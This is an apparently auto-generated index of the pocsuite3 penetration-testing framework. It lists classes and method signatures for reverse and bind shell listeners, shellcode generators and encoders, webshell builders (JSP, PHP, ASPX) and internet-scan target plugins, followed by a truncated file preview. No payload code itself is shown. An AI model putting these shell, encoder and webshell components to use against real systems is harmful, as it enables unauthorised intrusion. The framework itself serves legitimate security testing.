FILE: pocsuite3/lib/yaml/nuclei/protocols/common/interactsh/__init__.py
class InteractshClient (line 8) | class InteractshClient:
method poll (line 14) | def poll(self) -> None:
FILE: pocsuite3/lib/yaml/nuclei/protocols/common/replacer/__init__.py
class UnresolvedVariableException (line 6) | class UnresolvedVariableException(Exception):
function marker_replace (line 10) | def marker_replace(data, dynamic_values):
FILE: pocsuite3/lib/yaml/nuclei/protocols/http/__init__.py
class HTTPMethod (line 26) | class HTTPMethod(CaseInsensitiveEnum):
class HttpRequest (line 41) | class HttpRequest:
function http_response_to_dsl_map (line 113) | def http_response_to_dsl_map(resp: requests.Response):
function http_get_match_part (line 147) | def http_get_match_part(part: str, resp_data: dict, return_bytes: bool =...
function http_match (line 165) | def http_match(request: HttpRequest, resp_data: dict, interactsh=None):
function http_extract (line 226) | def http_extract(request: HttpRequest, resp_data: dict):
function extract_dict (line 252) | def extract_dict(text, line_sep='\n', kv_sep='='):
function http_request_generator (line 259) | def http_request_generator(request: HttpRequest, dynamic_values: Ordered...
function execute_http_request (line 324) | def execute_http_request(request: HttpRequest, dynamic_values, interacts...
FILE: pocsuite3/lib/yaml/nuclei/protocols/network/__init__.py
class NetworkInputType (line 25) | class NetworkInputType(CaseInsensitiveEnum):
class AddressKV (line 31) | class AddressKV:
class Input (line 39) | class Input:
class NetworkRequest (line 58) | class NetworkRequest:
function network_get_match_part (line 91) | def network_get_match_part(part: str, resp_data: dict, return_bytes: boo...
function network_extract (line 109) | def network_extract(request: NetworkRequest, resp_data: dict):
function network_match (line 135) | def network_match(request: NetworkRequest, resp_data: dict, interactsh=N...
function network_request_generator (line 193) | def network_request_generator(request: NetworkRequest, dynamic_values: O...
function execute_network_request (line 203) | def execute_network_request(request: NetworkRequest, dynamic_values, int...
FILE: pocsuite3/lib/yaml/nuclei/templates/__init__.py
class ProtocolType (line 9) | class ProtocolType(CaseInsensitiveEnum):
class Template (line 23) | class Template:
FILE: pocsuite3/modules/censys/__init__.py
class Censys (line 9) | class Censys():
method __init__ (line 10) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, uid='', secret=''):
method token_is_available (line 27) | def token_is_available(self):
method check_token (line 43) | def check_token(self):
method write_conf (line 57) | def write_conf(self):
method search (line 67) | def search(self, dork, pages=1, resource='ipv4'):
FILE: pocsuite3/modules/ceye/__init__.py
class CEye (line 14) | class CEye(object):
method __init__ (line 15) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 34) | def token_is_available(self):
method check_account (line 48) | def check_account(self):
method check_token (line 51) | def check_token(self):
method write_conf (line 63) | def write_conf(self):
method verify_request (line 72) | def verify_request(self, flag, type='request'):
method exact_request (line 96) | def exact_request(self, flag, type="request"):
method build_request (line 126) | def build_request(self, value, type="request"):
method getsubdomain (line 149) | def getsubdomain(self):
FILE: pocsuite3/modules/fofa/__init__.py
class Fofa (line 10) | class Fofa():
method __init__ (line 11) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, user=None, token=...
method token_is_available (line 30) | def token_is_available(self):
method check_token (line 43) | def check_token(self):
method write_conf (line 58) | def write_conf(self):
method search (line 68) | def search(self, dork, pages=1, resource='host'):
FILE: pocsuite3/modules/httpserver/__init__.py
class PHTTPSingleton (line 22) | class PHTTPSingleton(type):
method __call__ (line 28) | def __call__(cls, *args, **kwargs):
class BaseRequestHandler (line 34) | class BaseRequestHandler(SimpleHTTPRequestHandler):
method do_GET (line 35) | def do_GET(self):
method do_HEAD (line 64) | def do_HEAD(self):
class HTTPServerV6 (line 83) | class HTTPServerV6(HTTPServer):
class HTTPServerV4 (line 87) | class HTTPServerV4(HTTPServer):
class PHTTPServer (line 91) | class PHTTPServer(threading.Thread, metaclass=PHTTPSingleton):
method __init__ (line 92) | def __init__(self, bind_ip='0.0.0.0', bind_port=6666, is_ipv6=False, u...
method start (line 132) | def start(self, daemon=True):
method run (line 167) | def run(self):
method pause (line 195) | def pause(self):
method resume (line 198) | def resume(self):
method stop (line 201) | def stop(self):
FILE: pocsuite3/modules/hunter/__init__.py
class Hunter (line 9) | class Hunter():
method __init__ (line 10) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 27) | def token_is_available(self):
method check_token (line 44) | def check_token(self):
method write_conf (line 57) | def write_conf(self):
method search (line 66) | def search(self, dork, pages=2):
FILE: pocsuite3/modules/interactsh/__init__.py
class Interactsh (line 20) | class Interactsh:
method __init__ (line 21) | def __init__(self, server='', token=''):
method register (line 51) | def register(self):
method poll (line 68) | def poll(self):
method decrypt_data (line 87) | def decrypt_data(self, aes_key, data):
method build_request (line 98) | def build_request(self, length=10, method='http'):
method verify (line 118) | def verify(self, flag, get_result=False):
FILE: pocsuite3/modules/listener/bind_tcp.py
function read_inputs (line 14) | def read_inputs(s):
function read_until (line 27) | def read_until(conn, inputs):
function read_results (line 37) | def read_results(conn, inputs):
function flow_redirect (line 66) | def flow_redirect(conn):
function start_listener (line 75) | def start_listener(conn):
function bind_shell (line 83) | def bind_shell(obj, rce_func='_rce', check=True):
function bind_tcp_shell (line 95) | def bind_tcp_shell(host, port, check=True):
function bind_telnet_shell (line 110) | def bind_telnet_shell(host, port, user, pwd, check=True):
class BIND_PAYLOAD (line 130) | class BIND_PAYLOAD:
FILE: pocsuite3/modules/listener/reverse_tcp.py
function get_sock_listener (line 20) | def get_sock_listener(listen_port, listen_host="0.0.0.0", ipv6=False, pr...
function get_udp_listener (line 58) | def get_udp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0...
function get_tcp_listener (line 62) | def get_tcp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0...
function start_listener (line 66) | def start_listener():
function listener_worker (line 72) | def listener_worker():
function list_clients (line 88) | def list_clients():
function get_client (line 120) | def get_client(cmd):
function send_shell_commands_for_console (line 132) | def send_shell_commands_for_console(client):
function send_shell_commands (line 166) | def send_shell_commands(client):
function poll_cmd_execute (line 200) | def poll_cmd_execute(client, timeout=3):
function print_cmd_help (line 273) | def print_cmd_help():
function handle_listener_connection_for_console (line 283) | def handle_listener_connection_for_console(wait_time=3, try_count=3):
function handle_listener_connection (line 297) | def handle_listener_connection():
class REVERSE_PAYLOAD (line 331) | class REVERSE_PAYLOAD:
FILE: pocsuite3/modules/quake/__init__.py
class Quake (line 9) | class Quake():
method __init__ (line 10) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 26) | def token_is_available(self):
method check_token (line 42) | def check_token(self):
method write_conf (line 54) | def write_conf(self):
method search (line 63) | def search(self, dork, pages=2):
FILE: pocsuite3/modules/seebug/__init__.py
class Seebug (line 8) | class Seebug():
method __init__ (line 9) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 26) | def token_is_available(self):
method check_token (line 40) | def check_token(self):
method write_conf (line 52) | def write_conf(self):
method get_available_pocs (line 61) | def get_available_pocs(self):
method search_poc (line 64) | def search_poc(self, keyword):
method fetch_poc (line 74) | def fetch_poc(self, ssvid):
FILE: pocsuite3/modules/shodan/__init__.py
class Shodan (line 10) | class Shodan():
method __init__ (line 11) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 28) | def token_is_available(self):
method check_token (line 40) | def check_token(self):
method write_conf (line 53) | def write_conf(self):
method search (line 62) | def search(self, dork, pages=1):
FILE: pocsuite3/modules/spider/__init__.py
class LinkParser (line 10) | class LinkParser(HTMLParser):
method handle_starttag (line 11) | def handle_starttag(self, tag, attrs):
method is_origin (line 41) | def is_origin(self, url):
method get_links (line 45) | def get_links(self, url, url_ext=()):
function get_redirect_url (line 73) | def get_redirect_url(url):
function crawl (line 92) | def crawl(url, max_pages=50, url_ext=()):
FILE: pocsuite3/modules/zoomeye/__init__.py
class ZoomEye (line 10) | class ZoomEye():
method __init__ (line 11) | def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
method token_is_available (line 34) | def token_is_available(self):
method check_token (line 52) | def check_token(self):
method write_conf (line 68) | def write_conf(self):
method search (line 78) | def search(self, dork, pages=2, pagesize=20, search_type="v4"):
FILE: pocsuite3/plugins/file_record.py
class FileRecord (line 10) | class FileRecord(PluginBase):
method init (line 15) | def init(self):
method handle (line 23) | def handle(self, output):
method start (line 38) | def start(self):
FILE: pocsuite3/plugins/html_report.py
class HtmlExport (line 15) | class HtmlExport:
method __init__ (line 16) | def __init__(self, filename='', title='Report of []'):
method _write_header (line 48) | def _write_header(self):
method _write_navbar (line 62) | def _write_navbar(self, name='Target', menus={}):
method _writer_footer (line 77) | def _writer_footer(self):
method write_results (line 113) | def write_results(self, results=None):
method write_html (line 181) | def write_html(self, results=None):
class HtmlReport (line 203) | class HtmlReport(PluginBase):
method init (line 206) | def init(self):
method start (line 210) | def start(self):
FILE: pocsuite3/plugins/poc_from_pocs.py
class PocFromPocs (line 11) | class PocFromPocs(PluginBase):
method init (line 14) | def init(self):
FILE: pocsuite3/plugins/poc_from_redis.py
class PocFromRedis (line 7) | class PocFromRedis(PluginBase):
method get_redis (line 11) | def get_redis(redis_url=None):
method init (line 38) | def init(self):
FILE: pocsuite3/plugins/poc_from_seebug.py
class PocFromSeebug (line 9) | class PocFromSeebug(PluginBase):
method init_seebug_api (line 12) | def init_seebug_api(self):
method init (line 15) | def init(self):
FILE: pocsuite3/plugins/target_from_censys.py
class TargetFromCensys (line 11) | class TargetFromCensys(PluginBase):
method init_censys_api (line 14) | def init_censys_api(self):
method init (line 19) | def init(self):
FILE: pocsuite3/plugins/target_from_cidr.py
class TargetFromCIDR (line 15) | class TargetFromCIDR(PluginBase):
method init (line 18) | def init(self):
FILE: pocsuite3/plugins/target_from_fofa.py
class TargetFromFofa (line 11) | class TargetFromFofa(PluginBase):
method init_fofa_api (line 14) | def init_fofa_api(self):
method init (line 17) | def init(self):
FILE: pocsuite3/plugins/target_from_hunter.py
class TargetFromHunter (line 11) | class TargetFromHunter(PluginBase):
method init_hunter_api (line 14) | def init_hunter_api(self):
method init (line 19) | def init(self):
FILE: pocsuite3/plugins/target_from_quake.py
class TargetFromQuake (line 11) | class TargetFromQuake(PluginBase):
method init_quake_api (line 14) | def init_quake_api(self):
method init (line 17) | def init(self):
FILE: pocsuite3/plugins/target_from_redis.py
class TargetFromRedis (line 7) | class TargetFromRedis(PluginBase):
method get_redis (line 11) | def get_redis(redis_url=None):
method init (line 38) | def init(self):
FILE: pocsuite3/plugins/target_from_shodan.py
class TargetFromShodan (line 11) | class TargetFromShodan(PluginBase):
method init_shodan_api (line 14) | def init_shodan_api(self):
method init (line 19) | def init(self):
FILE: pocsuite3/plugins/target_from_zoomeye.py
class TargetFromZoomeye (line 10) | class TargetFromZoomeye(PluginBase):
method init_zoomeye_api (line 13) | def init_zoomeye_api(self):
method init (line 18) | def init(self):
FILE: pocsuite3/plugins/web_hook.py
function dingding_send (line 18) | def dingding_send(msg, access_token, secret, msgtype="markdown", title="...
function wx_work_send (line 38) | def wx_work_send(msg, key):
function web_hook_send (line 49) | def web_hook_send(msg):
class WebHook (line 59) | class WebHook(PluginBase):
method init (line 62) | def init(self):
method start (line 66) | def start(self):
FILE: pocsuite3/shellcodes/__init__.py
class OSShellcodes (line 14) | class OSShellcodes:
method __init__ (line 19) | def __init__(self, os_target, os_target_arch, connect_back_ip='localho...
method create_shellcode (line 40) | def create_shellcode(self, _shellcode_type='reverse', command='calc.ex...
method get_exe_path (line 82) | def get_exe_path(self):
method get_dll_path (line 87) | def get_dll_path(self):
class WebShell (line 93) | class WebShell:
method __init__ (line 94) | def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
method create_shellcode (line 103) | def create_shellcode(self, shell_type, inline=False):
FILE: pocsuite3/shellcodes/base.py
class ShellCode (line 3) | class ShellCode:
method __init__ (line 4) | def __init__(self, os_target='', os_target_arch='', connect_back_ip='l...
method format_shellcode (line 15) | def format_shellcode(self, code):
method get_shellcode (line 22) | def get_shellcode(self, inline=False):
method make_inline (line 25) | def make_inline(self, payload):
FILE: pocsuite3/shellcodes/data/java/src/ReverseTCP/Payload.java
class Payload (line 6) | public class Payload extends ClassLoader{
method main (line 8) | public static void main(String[] args) throws IOException {
method executeCommand (line 34) | public static String executeCommand(String[] command) {
method parseFileContent (line 56) | public static String[] parseFileContent(String path) {
method isWindows (line 76) | public static boolean isWindows() {
method isUnix (line 80) | public static boolean isUnix() {
FILE: pocsuite3/shellcodes/dotnet.py
class AspxShellCode (line 4) | class AspxShellCode(ShellCode):
method __init__ (line 8) | def __init__(self, connect_back_ip='localhost', connect_back_port=5555,
method get_aspx_code (line 15) | def get_aspx_code(self):
method get_shellcode (line 80) | def get_shellcode(self, inline=False):
FILE: pocsuite3/shellcodes/encoder.py
class EncoderError (line 8) | class EncoderError(Exception):
class Encoder (line 12) | class Encoder(object):
method encode (line 13) | def encode(self, payload):
class AlphanumericEncoder (line 17) | class AlphanumericEncoder(Encoder):
method __init__ (line 18) | def __init__(self, disallowed_chars="\x00\x0d\x0a", buffer_register='e...
method create_allowed_chars (line 24) | def create_allowed_chars(bad_chars):
method encode (line 31) | def encode(self, payload):
method create_decoder_stub (line 44) | def create_decoder_stub(self, reg):
method gen_decoder_prefix (line 65) | def gen_decoder_prefix(self, reg):
method encode_byte (line 96) | def encode_byte(self, block):
class XorEncoder (line 126) | class XorEncoder(Encoder):
method __init__ (line 127) | def __init__(self, disallowed_chars=(0x00, 0x0D, 0x0A)):
method set_disallowed_chars (line 132) | def set_disallowed_chars(chars):
method _get_supported_register_sets (line 138) | def _get_supported_register_sets(self):
method _get_register_set (line 141) | def _get_register_set(self, register_set):
method _get_header (line 144) | def _get_header(self):
method _get_payload_size_position (line 147) | def _get_payload_size_position(self):
method _get_xor_key_position (line 150) | def _get_xor_key_position(self):
method _encode_payload (line 153) | def _encode_payload(self, payload, register_sets):
method _prefix_header (line 176) | def _prefix_header(self, payload, register_sets):
method encode (line 205) | def encode(self, payload, register_sets=[]):
method encode_to_string (line 230) | def encode_to_string(self, payload, register_sets=[]):
class FnstenvXorEncoder (line 238) | class FnstenvXorEncoder(XorEncoder):
method _get_supported_register_sets (line 272) | def _get_supported_register_sets(self):
method _get_register_set (line 275) | def _get_register_set(self, register_set):
method _get_header (line 278) | def _get_header(self):
method _get_payload_size_position (line 281) | def _get_payload_size_position(self):
method _get_xor_key_position (line 284) | def _get_xor_key_position(self):
class JumpCallXorEncoder (line 288) | class JumpCallXorEncoder(XorEncoder):
method _get_header (line 313) | def _get_header(self):
method _get_supported_register_sets (line 316) | def _get_supported_register_sets(self):
method _get_register_set (line 319) | def _get_register_set(self, register_set):
method _get_payload_size_position (line 322) | def _get_payload_size_position(self):
method _get_xor_key_position (line 325) | def _get_xor_key_position(self):
class CodeEncoders (line 329) | class CodeEncoders:
method __init__ (line 334) | def __init__(self, OS_SYSTEM, OS_TARGET, OS_TARGET_ARCH, BADCHARS):
method encode_shellcode (line 345) | def encode_shellcode(self, _byte_array, encoder_type, debug=0):
method clean_bad_chars (line 365) | def clean_bad_chars(self, orig_array, payload):
method xor_bytes (line 376) | def xor_bytes(self, byte_array):
method xor_decoder (line 390) | def xor_decoder(self, _shellcode, debug=0):
method xor_encoder (line 451) | def xor_encoder(self, _byte_arr, debug=0):
method rot_13_decoder (line 496) | def rot_13_decoder(self, _shellcode, debug=0):
method rot_13_encoder (line 549) | def rot_13_encoder(self, _shellcode, debug=0):
method fnst_encoder (line 577) | def fnst_encoder(self, _byte_array, debug):
method jumpcall_encoder (line 585) | def jumpcall_encoder(self, _byte_array, debug):
method alphanum_encoder (line 593) | def alphanum_encoder(self, byte_str, debug=0, buffer_register='ecx'):
FILE: pocsuite3/shellcodes/generator.py
class ShellGenerator (line 18) | class ShellGenerator:
method __init__ (line 19) | def __init__(self, os_target, os_target_arch):
method check_settings (line 26) | def check_settings(self, addr, port):
method check_for_system_utils (line 36) | def check_for_system_utils(self):
method _make_path (line 48) | def _make_path(self, *paths):
method get_shellcode (line 56) | def get_shellcode(self, shellcode_type, connectback_ip="127.0.0.1", co...
method read_and_replace (line 107) | def read_and_replace(path, values, use_precompiled):
class ShellcodeToExe (line 121) | class ShellcodeToExe:
method __init__ (line 122) | def __init__(self, shellcode, target_os, target_arch, filename='', dll...
method mkdirs (line 130) | def mkdirs(self):
method create_win_x86_exe (line 134) | def create_win_x86_exe(self):
method create_win_x86_64_exe (line 162) | def create_win_x86_64_exe(self):
method create_linux_x86_exe (line 190) | def create_linux_x86_exe(self):
method create_linux_x86_64_exe (line 198) | def create_linux_x86_64_exe(self):
method create_x86_dll (line 208) | def create_x86_dll(self):
method create_executable (line 258) | def create_executable(self):
method write_file (line 280) | def write_file(data, path):
FILE: pocsuite3/shellcodes/java.py
class JavaShellCode (line 8) | class JavaShellCode(ShellCode):
method __init__ (line 12) | def __init__(self, connect_back_ip='localhost', connect_back_port=5555,
method get_jsp (line 20) | def get_jsp(self, inline=False):
method get_jar (line 73) | def get_jar(self, filename=""):
method get_shellcode (line 279) | def get_shellcode(self, inline=False):
FILE: pocsuite3/shellcodes/php.py
class PhpShellCode (line 4) | class PhpShellCode(ShellCode):
method __init__ (line 9) | def __init__(self, connect_back_ip='localhost', connect_back_port=5555...
method get_phpinfo (line 15) | def get_phpinfo(self):
method get_phpcode (line 20) | def get_phpcode(self):
method get_shellcode (line 64) | def get_shellcode(self, inline=False):
FILE: pocsuite3/shellcodes/python.py
class PythonShellCode (line 6) | class PythonShellCode(ShellCode):
method __init__ (line 11) | def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
method get_python_code (line 15) | def get_python_code(self, bad_chars):
method get_shellcode (line 44) | def get_shellcode(self, inline=False):
FILE: setup.py
function find_packages (line 8) | def find_packages(where='.'):
FILE: tests/login_demo.py
class DemoPOC (line 14) | class DemoPOC(POCBase):
method _options (line 31) | def _options(self):
method _verify (line 37) | def _verify(self):
method _attack (line 48) | def _attack(self):
method parse_output (line 51) | def parse_output(self, result):
FILE: tests/test_api_diy_options.py
class TestCase (line 9) | class TestCase(unittest.TestCase):
method setUp (line 10) | def setUp(self):
method tearDown (line 13) | def tearDown(self):
method verify_result (line 16) | def verify_result(self):
method test_cookie (line 31) | def test_cookie(self):
method test_cookie_dict_params (line 47) | def test_cookie_dict_params(self):
method test_import_run (line 64) | def test_import_run(self):
FILE: tests/test_api_get_poc_info.py
class TestCase (line 8) | class TestCase(unittest.TestCase):
method setUp (line 9) | def setUp(self):
method tearDown (line 12) | def tearDown(self):
method test_get_info (line 15) | def test_get_info(self):
method test_get_info_from_string (line 22) | def test_get_info_from_string(self):
FILE: tests/test_build_url.py
class CustomNamedTemporaryFile (line 10) | class CustomNamedTemporaryFile:
method __init__ (line 18) | def __init__(self, mode="wb", delete=True):
method __enter__ (line 22) | def __enter__(self):
method __exit__ (line 31) | def __exit__(self, exc_type, exc_val, exc_tb):
class TestCase (line 37) | class TestCase(unittest.TestCase):
method setUp (line 38) | def setUp(self):
method tearDown (line 41) | def tearDown(self):
method test_target_url_format (line 44) | def test_target_url_format(self):
method test_url_protocol_correct (line 153) | def test_url_protocol_correct(self):
method test_set_protocol_and_default_port (line 236) | def test_set_protocol_and_default_port(self):
method test_custom_protocol_and_default_port (line 293) | def test_custom_protocol_and_default_port(self):
method test_custom_protocol (line 350) | def test_custom_protocol(self):
method test_custom_default_port (line 390) | def test_custom_default_port(self):
FILE: tests/test_check_install_requires.py
class TestCase (line 5) | class TestCase(unittest.TestCase):
method setUp (line 6) | def setUp(self):
method test_module_is_none (line 9) | def test_module_is_none(self):
method test_built_in_module (line 14) | def test_built_in_module(self):
method test_normal_module (line 19) | def test_normal_module(self):
method test_module_include_version (line 24) | def test_module_include_version(self):
method test_import_name_and_install_name_are_inconsistent (line 38) | def test_import_name_and_install_name_are_inconsistent(self):
FILE: tests/test_cmd_diy_options.py
class TestCase (line 13) | class TestCase(unittest.TestCase):
method setUp (line 14) | def setUp(self):
method tearDown (line 18) | def tearDown(self):
method verify_result (line 21) | def verify_result(self):
method test_cmd_run (line 24) | def test_cmd_run(self):
FILE: tests/test_configfile.py
class TestCase (line 9) | class TestCase(unittest.TestCase):
method setUp (line 10) | def setUp(self):
method tearDown (line 15) | def tearDown(self):
method test_build_ini (line 19) | def test_build_ini(self):
method test_read_ini (line 202) | def test_read_ini(self):
FILE: tests/test_generate_shellcode_list.py
class TestCase (line 7) | class TestCase(unittest.TestCase):
method setUp (line 8) | def setUp(self):
method test_windows_shellcode (line 11) | def test_windows_shellcode(self):
method test_linux_shellcode (line 15) | def test_linux_shellcode(self):
FILE: tests/test_httpserver.py
class TestCase (line 19) | class TestCase(unittest.TestCase):
method setUp (line 20) | def setUp(self):
method tearDown (line 24) | def tearDown(self):
method test_only_start_server_once (line 28) | def test_only_start_server_once(self):
method test_singleton (line 38) | def test_singleton(self):
method test_ipv4 (line 45) | def test_ipv4(self):
method test_ipv6 (line 60) | def test_ipv6(self):
method test_ipv4_https (line 74) | def test_ipv4_https(self):
method test_ipv6_https (line 93) | def test_ipv6_https(self):
FILE: tests/test_import_pocsuite_execute.py
class TestCase (line 7) | class TestCase(unittest.TestCase):
method setUp (line 8) | def setUp(self):
method tearDown (line 15) | def tearDown(self):
method verify_result (line 18) | def verify_result(self):
method test_import_run (line 23) | def test_import_run(self):
FILE: tests/test_interactsh_module.py
class TestCase (line 8) | class TestCase(unittest.TestCase):
method setUp (line 9) | def setUp(self):
method tearDown (line 12) | def tearDown(self):
method test_interactsh (line 16) | def test_interactsh(self):
FILE: tests/test_nuclei_helper_functions.py
class TestCase (line 5) | class TestCase(unittest.TestCase):
method test_base64 (line 6) | def test_base64(self):
method test_base64_decode (line 9) | def test_base64_decode(self):
method test_base64_py (line 12) | def test_base64_py(self):
method test_concat (line 15) | def test_concat(self):
method test_compare_versions (line 18) | def test_compare_versions(self):
method test_contains (line 21) | def test_contains(self):
method test_contains_all (line 24) | def test_contains_all(self):
method test_contains_any (line 27) | def test_contains_any(self):
method test_dec_to_hex (line 30) | def test_dec_to_hex(self):
method test_hex_to_dec (line 33) | def test_hex_to_dec(self):
method test_bin_to_dec (line 37) | def test_bin_to_dec(self):
method test_oct_to_dec (line 41) | def test_oct_to_dec(self):
method test_gzip (line 46) | def test_gzip(self):
method test_gzip_decode (line 49) | def test_gzip_decode(self):
method test_zlib (line 55) | def test_zlib(self):
method test_zlib_decode (line 58) | def test_zlib_decode(self):
method test_hex_decode (line 61) | def test_hex_decode(self):
method test_hex_encode (line 64) | def test_hex_encode(self):
method test_html_escape (line 67) | def test_html_escape(self):
method test_html_unescape (line 70) | def test_html_unescape(self):
method test_md5 (line 73) | def test_md5(self):
method test_mmh3 (line 76) | def test_mmh3(self):
method test_rand_base (line 79) | def test_rand_base(self):
method test_rand_char (line 82) | def test_rand_char(self):
method test_rand_int (line 85) | def test_rand_int(self):
method test_rand_text_alpha (line 88) | def test_rand_text_alpha(self):
method test_rand_text_alphanumeric (line 91) | def test_rand_text_alphanumeric(self):
method test_rand_text_numeric (line 94) | def test_rand_text_numeric(self):
method test_regex (line 97) | def test_regex(self):
method test_remove_bad_chars (line 100) | def test_remove_bad_chars(self):
method test_repeat (line 103) | def test_repeat(self):
method test_replace (line 106) | def test_replace(self):
method test_replace_regex (line 109) | def test_replace_regex(self):
method test_reverse (line 112) | def test_reverse(self):
method test_sha1 (line 115) | def test_sha1(self):
method test_sha256 (line 118) | def test_sha256(self):
method test_to_lower (line 124) | def test_to_lower(self):
method test_to_upper (line 127) | def test_to_upper(self):
method test_trim (line 130) | def test_trim(self):
method test_trim_left (line 133) | def test_trim_left(self):
method test_trim_prefix (line 136) | def test_trim_prefix(self):
method test_trim_right (line 139) | def test_trim_right(self):
method test_trim_space (line 142) | def test_trim_space(self):
method test_trim_suffix (line 145) | def test_trim_suffix(self):
method test_unix_time (line 148) | def test_unix_time(self):
method test_url_decode (line 151) | def test_url_decode(self):
method test_url_encode (line 157) | def test_url_encode(self):
method test_join (line 163) | def test_join(self):
method test_hmac (line 166) | def test_hmac(self):
method test_date_time (line 170) | def test_date_time(self):
method test_to_unix_time (line 174) | def test_to_unix_time(self):
method test_starts_with (line 177) | def test_starts_with(self):
method test_line_starts_with (line 180) | def test_line_starts_with(self):
method test_ends_with (line 183) | def test_ends_with(self):
method test_line_ends_with (line 186) | def test_line_ends_with(self):
FILE: tests/test_osshell.py
class TestCase (line 8) | class TestCase(unittest.TestCase):
method setUp (line 9) | def setUp(self):
method tearDown (line 15) | def tearDown(self):
method test_win_x86_bind (line 19) | def test_win_x86_bind(self):
method test_win_x86_reverse (line 46) | def test_win_x86_reverse(self):
method test_win_x64_bind (line 73) | def test_win_x64_bind(self):
method test_win_x64_reverse (line 76) | def test_win_x64_reverse(self):
method test_linux_x86_bind (line 79) | def test_linux_x86_bind(self):
method test_linux_x86_reverse (line 82) | def test_linux_x86_reverse(self):
method test_linux_x64_bind (line 85) | def test_linux_x64_bind(self):
method test_linux_x64_reverse (line 88) | def test_linux_x64_reverse(self):
FILE: tests/test_parse_target.py
class TestCase (line 9) | class TestCase(unittest.TestCase):
method setUp (line 10) | def setUp(self):
method tearDown (line 13) | def tearDown(self):
method test_domain (line 16) | def test_domain(self):
method test_domain_url (line 21) | def test_domain_url(self):
method test_domain_url_with_additional_ports (line 26) | def test_domain_url_with_additional_ports(self):
method test_ipv4_url (line 34) | def test_ipv4_url(self):
method test_ipv6_url (line 39) | def test_ipv6_url(self):
method test_ipv4 (line 44) | def test_ipv4(self):
method test_ipv4_cidr (line 49) | def test_ipv4_cidr(self):
method test_ipv4_cidr_with_host_32 (line 55) | def test_ipv4_cidr_with_host_32(self):
method test_ipv4_with_additional_ports (line 60) | def test_ipv4_with_additional_ports(self):
method test_ipv6 (line 71) | def test_ipv6(self):
method test_ipv6_cidr (line 76) | def test_ipv6_cidr(self):
method test_ipv6_cidr_with_host_128 (line 83) | def test_ipv6_cidr_with_host_128(self):
method test_ipv6_with_additional_ports (line 88) | def test_ipv6_with_additional_ports(self):
method test_localhost (line 104) | def test_localhost(self):
method test_random_str (line 109) | def test_random_str(self):
FILE: tests/test_request_raw.py
class TestCase (line 5) | class TestCase(unittest.TestCase):
method setUp (line 6) | def setUp(self):
method tearDown (line 9) | def tearDown(self):
method test_get (line 13) | def test_get(self):
method test_post (line 29) | def test_post(self):
method test_json (line 47) | def test_json(self):
FILE: tests/test_show_poc_options.py
class TestCase (line 7) | class TestCase(unittest.TestCase):
method setUp (line 8) | def setUp(self):
method tearDown (line 11) | def tearDown(self):
method verify_result (line 14) | def verify_result(self):
method test_cmd_run (line 17) | def test_cmd_run(self):
FILE: tests/test_spier_crawl.py
class TestCase (line 5) | class TestCase(unittest.TestCase):
method setUp (line 6) | def setUp(self):
method tearDown (line 9) | def tearDown(self):
method verify_result (line 12) | def verify_result(self, urls):
method test_import_run (line 19) | def test_import_run(self):
FILE: tests/test_webshell.py
class TestCase (line 8) | class TestCase(unittest.TestCase):
method setUp (line 9) | def setUp(self):
method tearDown (line 12) | def tearDown(self):
method test_gen_jsp_shell (line 16) | def test_gen_jsp_shell(self):
method test_gen_jar_shell (line 22) | def test_gen_jar_shell(self):
method test_gen_php_shell (line 28) | def test_gen_php_shell(self):
Condensed preview — 164 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (789K chars).
[
{
"path": ".coveragerc",
"chars": 351,
"preview": "[run]\ninclude = pocsuite3/*\nomit =\n *migrations*\n *tests*\n venv/*\n\n[report]\ninclude = pocsuite3/*\nomit =\n *m"
},
{
"path": ".github/workflows/lint.yml",
"chars": 1242,
"preview": "name: Lint\non: [pull_request]\n\njobs:\n lint:\n strategy:\n matrix:\n python-version: ['3.10']\n os: [u"
},
{
"path": ".github/workflows/pylint.yml",
"chars": 1051,
"preview": "name: PyLint\non: [pull_request]\n\njobs:\n pylint:\n strategy:\n matrix:\n python-version: ['3.10']\n os"
},
{
"path": ".github/workflows/release.yml",
"chars": 2850,
"preview": "name: Release Package\n\non:\n push:\n tags:\n - v*\n\njobs:\n pypi:\n runs-on: ubuntu-latest\n steps:\n - use"
},
{
"path": ".github/workflows/test.yml",
"chars": 812,
"preview": "name: Test\non: [pull_request]\n\njobs:\n test:\n strategy:\n matrix:\n python-version: ['3.9', '3.11']\n "
},
{
"path": ".gitignore",
"chars": 873,
"preview": "### OSX ###\n.DS_Store\n.AppleDouble\n.LSOverride\n\n### SublimeText ###\n# cache files for sublime text\n*.tmlanguage.cache\n*."
},
{
"path": "CHANGELOG.md",
"chars": 9667,
"preview": "# version 2.1.0\n----------------\n * fix codes ignored in raw strings #432\n * update zoomeye api to v2\n\n# verison 2.0.8\n "
},
{
"path": "CONTRIBUTORS.md",
"chars": 1577,
"preview": "hysia <s1@seebug.org>\n* for contributing core code\n\nbadcode <s1@seebug.org>\n* for contributing core code\n\ncc <s1@seebug."
},
{
"path": "COPYING",
"chars": 16032,
"preview": "COPYING -- Describes the terms under which pocsuite is distributed. A copy\nof the GNU General Public License (GPL) is ap"
},
{
"path": "Dockerfile",
"chars": 1083,
"preview": "FROM ubuntu:22.04\nLABEL maintainer=\"Knownsec 404 Team\"\n\nARG version\nENV DEBIAN_FRONTEND=noninteractive\n\nRUN apt-get upda"
},
{
"path": "MANIFEST.in",
"chars": 205,
"preview": "include MANIFEST.in\ninclude LICENSE\ninclude README.md\ninclude CHANGELOG.md\ninclude CONTRIBUTORS.md\nrecursive-include poc"
},
{
"path": "README.md",
"chars": 10129,
"preview": "# pocsuite3\n\n[](https://www.python.org/) [![License](ht"
},
{
"path": "docs/CODING.md",
"chars": 31560,
"preview": "# This document has stopped maintenance, please move to https://pocsuite.org\n\nPocsuite3 开发文档及 PoC 编写规范及要求说明\n---\n* [概述](#"
},
{
